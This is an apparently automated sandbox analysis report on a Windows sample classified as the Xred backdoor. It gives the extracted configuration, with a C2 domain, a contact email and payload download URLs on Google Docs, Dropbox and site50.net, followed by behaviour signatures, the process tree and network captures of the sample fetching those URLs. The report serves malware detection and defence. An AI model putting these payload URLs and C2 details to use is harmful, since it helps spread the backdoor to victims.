Analysis

  • max time kernel
    112s
  • max time network
    118s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-12-2024 01:13

General

  • Target

    1780b674a95a4e57c241ea10150c7117db2bd6366c0515db354bcd52859654ccN.exe

  • Size

    829KB

  • MD5

    e60d708e062dfc68d4110ad676a056d0

  • SHA1

    e7116b561ebe31a1acecaddb49825b5385168aa3

  • SHA256

    1780b674a95a4e57c241ea10150c7117db2bd6366c0515db354bcd52859654cc

  • SHA512

    2bbefe5455815ac3b6776182437694e981d627d2addd46b3ac4b10ecbb37fcf2aa2261c5d7cb3be6756c7b17f134651ca9ee27595fd05ecbb1e5d00cf3cab167

  • SSDEEP

    12288:pMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9px4DyNL:pnsJ39LyjbJkQFMhmC+6GD91x

Malware Config

Extracted

Family

xred

C2

xred.mooo.com

Attributes
  • email

    xredline1@gmail.com

  • payload_url

    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

    http://xred.site50.net/syn/SUpdate.ini

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

    https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

    http://xred.site50.net/syn/Synaptics.rar

    https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

    http://xred.site50.net/syn/SSLLibrary.dll

Signatures

  • Xred

    Xred is backdoor written in Delphi.

  • Xred family
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1780b674a95a4e57c241ea10150c7117db2bd6366c0515db354bcd52859654ccN.exe
    "C:\Users\Admin\AppData\Local\Temp\1780b674a95a4e57c241ea10150c7117db2bd6366c0515db354bcd52859654ccN.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1968
    • C:\Users\Admin\AppData\Local\Temp\._cache_1780b674a95a4e57c241ea10150c7117db2bd6366c0515db354bcd52859654ccN.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_1780b674a95a4e57c241ea10150c7117db2bd6366c0515db354bcd52859654ccN.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:544
    • C:\ProgramData\Synaptics\Synaptics.exe
      "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:2084
      • C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
        "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1512
  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3860

Network

  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    172.214.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.214.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    104.219.191.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    104.219.191.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    72.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    72.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    18.89.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.89.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    xred.mooo.com
    Synaptics.exe
    Remote address:
    8.8.8.8:53
    Request
    xred.mooo.com
    IN A
    Response
  • flag-us
    DNS
    freedns.afraid.org
    Synaptics.exe
    Remote address:
    8.8.8.8:53
    Request
    freedns.afraid.org
    IN A
    Response
    freedns.afraid.org
    IN A
    69.42.215.252
  • flag-us
    GET
    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
    Synaptics.exe
    Remote address:
    69.42.215.252:80
    Request
    GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
    User-Agent: MyApp
    Host: freedns.afraid.org
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 26 Dec 2024 01:13:35 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    X-Cache: MISS
  • flag-us
    DNS
    252.215.42.69.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    252.215.42.69.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    252.215.42.69.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    252.215.42.69.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    154.239.44.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    154.239.44.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    31.73.42.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    31.73.42.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    200.163.202.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.163.202.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    206.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.23.85.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    107.12.20.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    107.12.20.2.in-addr.arpa
    IN PTR
    Response
    107.12.20.2.in-addr.arpa
    IN PTR
    a2-20-12-107deploystaticakamaitechnologiescom
  • flag-us
    DNS
    docs.google.com
    Synaptics.exe
    Remote address:
    8.8.8.8:53
    Request
    docs.google.com
    IN A
    Response
    docs.google.com
    IN A
    216.58.214.174
  • flag-fr
    GET
    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Synaptics.exe
    Remote address:
    216.58.214.174:443
    Request
    GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
    Response
    HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Thu, 26 Dec 2024 01:14:34 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-WtocK5xnDzMxV4gfk2es-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-fr
    GET
    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Synaptics.exe
    Remote address:
    216.58.214.174:443
    Request
    GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
    Cookie: NID=520=evJOLPqE6qXCHZVpH9HVCsF6NxVmQtDSqs1hAvIpvs0tuQAJ9uw2eBuJfKX4GLhAyD9Nz2mNxkoOK4Hft5kKKq-39meT7v1gQk7_1XofuIFnmyBXx4lh-1XL3zGcsYEvhhV0apVHk2dchaWoZ6iXJ4GnDXcpHN08W0qMxDYxn1T29dg
    Response
    HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Thu, 26 Dec 2024 01:14:35 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: script-src 'report-sample' 'nonce-bhzkNbcVc6muW-fbOFKBVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-fr
    GET
    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Synaptics.exe
    Remote address:
    216.58.214.174:443
    Request
    GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
    Cookie: NID=520=evJOLPqE6qXCHZVpH9HVCsF6NxVmQtDSqs1hAvIpvs0tuQAJ9uw2eBuJfKX4GLhAyD9Nz2mNxkoOK4Hft5kKKq-39meT7v1gQk7_1XofuIFnmyBXx4lh-1XL3zGcsYEvhhV0apVHk2dchaWoZ6iXJ4GnDXcpHN08W0qMxDYxn1T29dg
    Response
    HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Thu, 26 Dec 2024 01:14:36 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-EcL2ogR8_8kLziuvcJ1mwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-us
    DNS
    c.pki.goog
    Synaptics.exe
    Remote address:
    8.8.8.8:53
    Request
    c.pki.goog
    IN A
    Response
    c.pki.goog
    IN CNAME
    pki-goog.l.google.com
    pki-goog.l.google.com
    IN A
    142.250.179.67
  • flag-fr
    GET
    http://c.pki.goog/r/r1.crl
    Synaptics.exe
    Remote address:
    142.250.179.67:80
    Request
    GET /r/r1.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: c.pki.goog
    Response
    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
    Cross-Origin-Resource-Policy: cross-origin
    Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
    Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
    Content-Length: 854
    X-Content-Type-Options: nosniff
    Server: sffe
    X-XSS-Protection: 0
    Date: Thu, 26 Dec 2024 00:58:35 GMT
    Expires: Thu, 26 Dec 2024 01:48:35 GMT
    Cache-Control: public, max-age=3000
    Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
    Content-Type: application/pkix-crl
    Vary: Accept-Encoding
    Age: 959
  • flag-us
    DNS
    88.210.23.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    88.210.23.2.in-addr.arpa
    IN PTR
    Response
    88.210.23.2.in-addr.arpa
    IN PTR
    a2-23-210-88deploystaticakamaitechnologiescom
  • flag-us
    DNS
    174.214.58.216.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    174.214.58.216.in-addr.arpa
    IN PTR
    Response
    174.214.58.216.in-addr.arpa
    IN PTR
    mad01s26-in-f141e100net
    174.214.58.216.in-addr.arpa
    IN PTR
    mad01s26-in-f174�I
    174.214.58.216.in-addr.arpa
    IN PTR
    par10s42-in-f14�I
  • flag-us
    DNS
    67.179.250.142.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    67.179.250.142.in-addr.arpa
    IN PTR
    Response
    67.179.250.142.in-addr.arpa
    IN PTR
    par21s19-in-f31e100net
  • flag-us
    DNS
    o.pki.goog
    Synaptics.exe
    Remote address:
    8.8.8.8:53
    Request
    o.pki.goog
    IN A
    Response
    o.pki.goog
    IN CNAME
    pki-goog.l.google.com
    pki-goog.l.google.com
    IN A
    142.250.179.67
  • flag-fr
    GET
    http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD8Elu9WzbqaxI7ClVJiEyf
    Synaptics.exe
    Remote address:
    142.250.179.67:80
    Request
    GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD8Elu9WzbqaxI7ClVJiEyf HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: o.pki.goog
    Response
    HTTP/1.1 200 OK
    Server: ocsp_responder
    Content-Length: 472
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Date: Thu, 26 Dec 2024 00:28:24 GMT
    Cache-Control: public, max-age=14400
    Content-Type: application/ocsp-response
    Age: 2770
  • flag-fr
    GET
    http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDkqhDvrMuENxBpWocUnIUC
    Synaptics.exe
    Remote address:
    142.250.179.67:80
    Request
    GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDkqhDvrMuENxBpWocUnIUC HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: o.pki.goog
    Response
    HTTP/1.1 200 OK
    Server: ocsp_responder
    Content-Length: 472
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Date: Thu, 26 Dec 2024 00:48:04 GMT
    Cache-Control: public, max-age=14400
    Content-Type: application/ocsp-response
    Age: 1591
  • flag-us
    DNS
    drive.usercontent.google.com
    Synaptics.exe
    Remote address:
    8.8.8.8:53
    Request
    drive.usercontent.google.com
    IN A
    Response
    drive.usercontent.google.com
    IN A
    142.250.74.225
  • flag-fr
    GET
    https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Synaptics.exe
    Remote address:
    142.250.74.225:443
    Request
    GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC7FXX9vEmwGRAe3bskBaTWVhhtkCdfQPspqp5NtPbvyLCOrS6G6j8jSObbVoZNpkPHQ
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Thu, 26 Dec 2024 01:14:35 GMT
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    Content-Security-Policy: script-src 'report-sample' 'nonce-AD-yREWSF_KE9Z3IjgLmXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Content-Length: 1652
    Server: UploadServer
    Set-Cookie: NID=520=evJOLPqE6qXCHZVpH9HVCsF6NxVmQtDSqs1hAvIpvs0tuQAJ9uw2eBuJfKX4GLhAyD9Nz2mNxkoOK4Hft5kKKq-39meT7v1gQk7_1XofuIFnmyBXx4lh-1XL3zGcsYEvhhV0apVHk2dchaWoZ6iXJ4GnDXcpHN08W0qMxDYxn1T29dg; expires=Fri, 27-Jun-2025 01:14:35 GMT; path=/; domain=.google.com; HttpOnly
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
  • flag-fr
    GET
    https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Synaptics.exe
    Remote address:
    142.250.74.225:443
    Request
    GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=evJOLPqE6qXCHZVpH9HVCsF6NxVmQtDSqs1hAvIpvs0tuQAJ9uw2eBuJfKX4GLhAyD9Nz2mNxkoOK4Hft5kKKq-39meT7v1gQk7_1XofuIFnmyBXx4lh-1XL3zGcsYEvhhV0apVHk2dchaWoZ6iXJ4GnDXcpHN08W0qMxDYxn1T29dg
    Response
    HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC7JtQZKBnzlIDwuGE3KkH6WgkGB6wfmTMoA2rzvRBZyCVkuuLROQlKPCctMhQpTi0z5
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Thu, 26 Dec 2024 01:14:35 GMT
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-O1s0ANOETrzcRa7PgHkIlw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
  • flag-fr
    GET
    https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Synaptics.exe
    Remote address:
    142.250.74.225:443
    Request
    GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=evJOLPqE6qXCHZVpH9HVCsF6NxVmQtDSqs1hAvIpvs0tuQAJ9uw2eBuJfKX4GLhAyD9Nz2mNxkoOK4Hft5kKKq-39meT7v1gQk7_1XofuIFnmyBXx4lh-1XL3zGcsYEvhhV0apVHk2dchaWoZ6iXJ4GnDXcpHN08W0qMxDYxn1T29dg
    Response
    HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC6Czn9tyy39OXModjBORt-nh_NhU61rhy5B6hx7afaUOOXo04glSowROAgjMwsY5XTp
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Thu, 26 Dec 2024 01:14:36 GMT
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-dnzbckxwdDSV4G6SAgnMPQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
  • flag-us
    DNS
    225.74.250.142.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    225.74.250.142.in-addr.arpa
    IN PTR
    Response
    225.74.250.142.in-addr.arpa
    IN PTR
    par10s40-in-f11e100net
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
    Response
  • 69.42.215.252:80
    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
    http
    Synaptics.exe
    660 B
    455 B
    11
    5

    HTTP Request

    GET http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

    HTTP Response

    200
  • 216.58.214.174:443
    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    tls, http
    Synaptics.exe
    1.9kB
    11.3kB
    16
    14

    HTTP Request

    GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    HTTP Response

    303

    HTTP Request

    GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    HTTP Response

    303

    HTTP Request

    GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    HTTP Response

    303
  • 142.250.179.67:80
    http://c.pki.goog/r/r1.crl
    http
    Synaptics.exe
    303 B
    1.7kB
    4
    4

    HTTP Request

    GET http://c.pki.goog/r/r1.crl

    HTTP Response

    200
  • 142.250.179.67:80
    http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDkqhDvrMuENxBpWocUnIUC
    http
    Synaptics.exe
    736 B
    1.6kB
    6
    4

    HTTP Request

    GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD8Elu9WzbqaxI7ClVJiEyf

    HTTP Response

    200

    HTTP Request

    GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDkqhDvrMuENxBpWocUnIUC

    HTTP Response

    200
  • 142.250.74.225:443
    https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    tls, http
    Synaptics.exe
    2.4kB
    14.7kB
    23
    21

    HTTP Request

    GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    HTTP Response

    404

    HTTP Request

    GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    HTTP Response

    404

    HTTP Request

    GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    HTTP Response

    404
  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
    90 B
    1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    172.214.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.214.232.199.in-addr.arpa

  • 8.8.8.8:53
    104.219.191.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    104.219.191.52.in-addr.arpa

  • 8.8.8.8:53
    72.32.126.40.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    72.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    18.89.109.52.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    18.89.109.52.in-addr.arpa

  • 8.8.8.8:53
    xred.mooo.com
    dns
    Synaptics.exe
    59 B
    118 B
    1
    1

    DNS Request

    xred.mooo.com

  • 8.8.8.8:53
    freedns.afraid.org
    dns
    Synaptics.exe
    64 B
    80 B
    1
    1

    DNS Request

    freedns.afraid.org

    DNS Response

    69.42.215.252

  • 224.0.0.251:5353
    114 B
    2
  • 8.8.8.8:53
